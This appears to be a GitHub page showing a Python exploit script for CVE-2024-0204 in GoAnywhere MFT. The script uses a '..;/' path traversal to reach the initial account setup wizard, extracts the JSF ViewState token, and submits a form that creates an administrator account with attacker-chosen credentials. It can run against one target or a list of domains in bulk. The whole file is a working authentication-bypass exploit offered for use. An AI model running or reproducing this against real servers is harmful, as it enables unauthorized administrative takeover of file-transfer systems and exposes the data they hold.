3xplo1tz/CVE-2024-0204.py at main · toanphung/3xplo1tz · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from colorama import Fore
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup
import requests
import argparse
import socket

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"

parser = argparse.ArgumentParser()

parser.add_argument('-t', '--target',
                   help="target to scan")

parser.add_argument('-u', '--username',
                   help="username to create")

parser.add_argument('-p', '--password',
                   help="password to create")

parser.add_argument('-f', '--file',
                   help="domains to scan")

args = parser.parse_args()

header = {
    "User-Agent": user_agent
}

def vuln_check(url: str, username: str, password: str) -> str:

    try:
        s = requests.Session()
        r = s.get(f"https://{url}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml", verify = False, headers=header, timeout=10)

        if r.status_code == 401:
            print(f"{Fore.RED}[-] {Fore.WHITE} {url}")
        else:
            print(f"{Fore.GREEN}[+] {Fore.WHITE} {url}")

        data = {
        "j_id_u:creteAdminGrid:username": username,
        "j_id_u:creteAdminGrid:password_hinput": password,
        "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
        "j_id_u:creteAdminGrid:confirmPassword_hinput": password,
        "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
        "j_id_u:creteAdminGrid:submitButton": "",
        "createAdminForm_SUBMIT": 1,
        }

        soup = BeautifulSoup(r.text, "html.parser")
        input_field = soup.find('input', {'name': 'javax.faces.ViewState'})
        data['javax.faces.ViewState'] = input_field['value']

        r2 = s.get(f"https://{url}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml", verify=False, data=data)

        if r2.status_code != 200:
            print(f"{Fore.RED}Failed to create user\n")
    except Exception as e:
        print(e)

def scan_file(file: str, username, password) -> str:
    with open(file, "r") as f:
        domains = [x.strip() for x in f.readlines()]

    for domain_list in domains:
        vuln_check(domain_list, username, password)


if __name__ == "__main__":

    if args.target:
        if args.username:
            if args.password:
                vuln_check(args.target, args.username, args.password)

    if args.file:
        if args.username:
            if args.password:
                scan_file(args.file, args.username, args.password)